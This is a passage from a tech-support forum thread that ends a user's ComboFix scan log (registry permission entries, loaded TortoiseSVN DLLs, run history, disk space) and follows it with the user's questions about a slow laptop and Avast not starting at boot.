[HKEY_LOCAL_MACHINE\system\ControlSet010\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0002\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\system\ControlSet010\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0003\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
--------------------- DLLs Loaded Under Running Processes ---------------------
.
- - - - - - - > 'Explorer.exe'(5068)
c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
c:\program files\TortoiseSVN\bin\TortoiseStub.dll
c:\program files\TortoiseSVN\bin\TortoiseSVN.dll
c:\program files\TortoiseSVN\bin\intl3_tsvn.dll
.
Completion time: 2011-08-20 13:33:34
ComboFix-quarantined-files.txt 2011-08-20 12:33
ComboFix2.txt 2011-08-18 22:55
ComboFix3.txt 2011-08-18 12:15
ComboFix4.txt 2011-05-08 15:29
.
Pre-Run: 35,295,846,400 bytes free
Post-Run: 35,037,990,912 bytes free
.
Current=10 Default=10 Failed=1 LastKnownGood=10 Sets=1,2,3,4,5,6,7,8,9,10,12
- - End Of File - - FDFA3554D61BCA4DCDBB7262E92A67EB




Could you help me free up some memory so my laptop can perform faster?
  • 0

#60
Bismillah

Bismillah

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 514 posts
Also avast doesnt turn on at boot i have to manually turn it on
  • 0






Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP